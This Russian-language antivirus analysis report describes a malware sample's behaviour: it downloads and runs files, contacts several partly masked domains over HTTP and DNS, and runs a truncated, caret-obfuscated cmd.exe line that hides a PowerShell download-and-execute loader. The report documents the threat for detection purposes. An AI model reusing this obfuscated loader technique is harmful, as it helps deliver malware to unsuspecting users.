Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"^s^e^t ^x^i^U^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^aer^b;^E^z^l^$^ ^m^e^t^I^-^e^kovn^I^;)^E^z^l$^ ^,^A^Q^L^$(^e^l^i^F^d^a^olnw^o^D^.^pr^Y^$^{^yrt^{)Cr^b^$^ n^i^ ^A^Q^L^...
Сетевая активность
Подключается к
- 'ke###ones.com':80
- 'ke###ones.com':443
- 'be###suals.com':80
- 'be###suals.com':443
TCP
Запросы HTTP GET
- http://ke###ones.com/pR
- http://be###suals.com/S2hMkKS
Другие
- 'ke###ones.com':443
- 'be###suals.com':443
UDP
- DNS ASK so###lab.com
- DNS ASK ke###ones.com
- DNS ASK be###suals.com
- DNS ASK cl########urgiaplasticasp.com.br
- DNS ASK pr##e.ge
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"^s^e^t ^x^i^U^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^aer^b;^E^z^l^$^ ^m^e^t^I^-^e^kovn^I^;)^E^z^l$^ ^,^A^Q^L^$(^e^l^i^F^d^a^olnw^o^D^.^pr^Y^$^{^yrt^{)Cr^b^$^ n^i^ ^A^Q^L^...' (со скрытым окном)
